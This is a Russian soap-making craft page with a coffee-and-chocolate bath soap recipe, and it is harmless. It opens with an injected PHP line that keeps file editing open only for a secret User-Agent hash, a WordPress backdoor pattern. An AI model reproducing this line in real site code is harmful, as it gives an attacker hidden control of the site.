if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепт как своими руками сделать банное мыло с кофе и шоколадом | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт как своими руками сделать банное мыло с кофе и шоколадом

Косметическое мыло для тела - одно из наиболее популярных. Сегодня я хотела бы рассказать как сделать такое мыло, которое увлажнит и смягчит кожу, будет обладать антицеллюлитным эффектом, отшелушит омертвевшие клетки кожи, улучшит эластичность и в добавок будет обладать омолаживающим эффектом. Просто чудо, а не мыло!

Кос­ме­ти­че­ское мыло для тела — одно из наи­бо­лее попу­ляр­ных. Сего­дня я хоте­ла бы рас­ска­зать как сде­лать такое мыло, кото­рое увлаж­нит и смяг­чит кожу, будет обла­дать анти­цел­люлит­ным эффек­том, отше­лу­шит омерт­вев­шие клет­ки кожи, улуч­шит эла­стич­ность и в доба­вок будет обла­дать омо­ла­жи­ва­ю­щим эффек­том. Про­сто чудо, а не мыло!

ингре­ди­ен­ты:

  • Про­зрач­ная осно­ва для мыла — 60 г.
  • белая осно­ва — 30 г.
  • немно­го моло­то­го кофе
  • поло­ви­на чай­ной лож­ки тер­то­го горь­ко­го шоколада
  • поло­ви­на чай­ной лож­ки меда
  • гли­це­рин
  • аро­ма­ти­за­тор “Шоко­лад”
  • любая фор­моч­ка для мыла

Эта­пы при­го­тов­ле­ния:

  1. Необ­хо­ди­мо рас­то­пить про­зрач­ную осно­ву для мыла при помо­щи водя­ной бани, не поз­во­ляя ей кипеть.
  2. Затем доба­вить часть гли­це­ри­на, 3 кап­ли аро­ма­ти­за­то­ра “Шоко­лад”.
  3. Отдель­но рас­то­пить мед, и сме­шать его с шоко­ла­дом и моло­тым кофе.
  4. Нуж­но соеди­нить все эле­мен­ты мыла посто­ян­но помешивая.
  5. Отдель­но нуж­но рас­то­пить белую основу.
  6. В нее доба­вить гли­це­рин, аро­ма­ти­за­то­ра “Шоко­лад” 5 капель.
  7. Фор­му зара­нее сма­зать олив­ко­вым мас­лом. Затем нуж­но напо­ло­ви­ну залить фор­му мылом, и дать ей застыть, а затем долить дру­гое мыло.

И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: AmouR

Обожаю квиллинг, рукоделие и рисование. Ну и конечно мыловарение! Читайте все мои записи!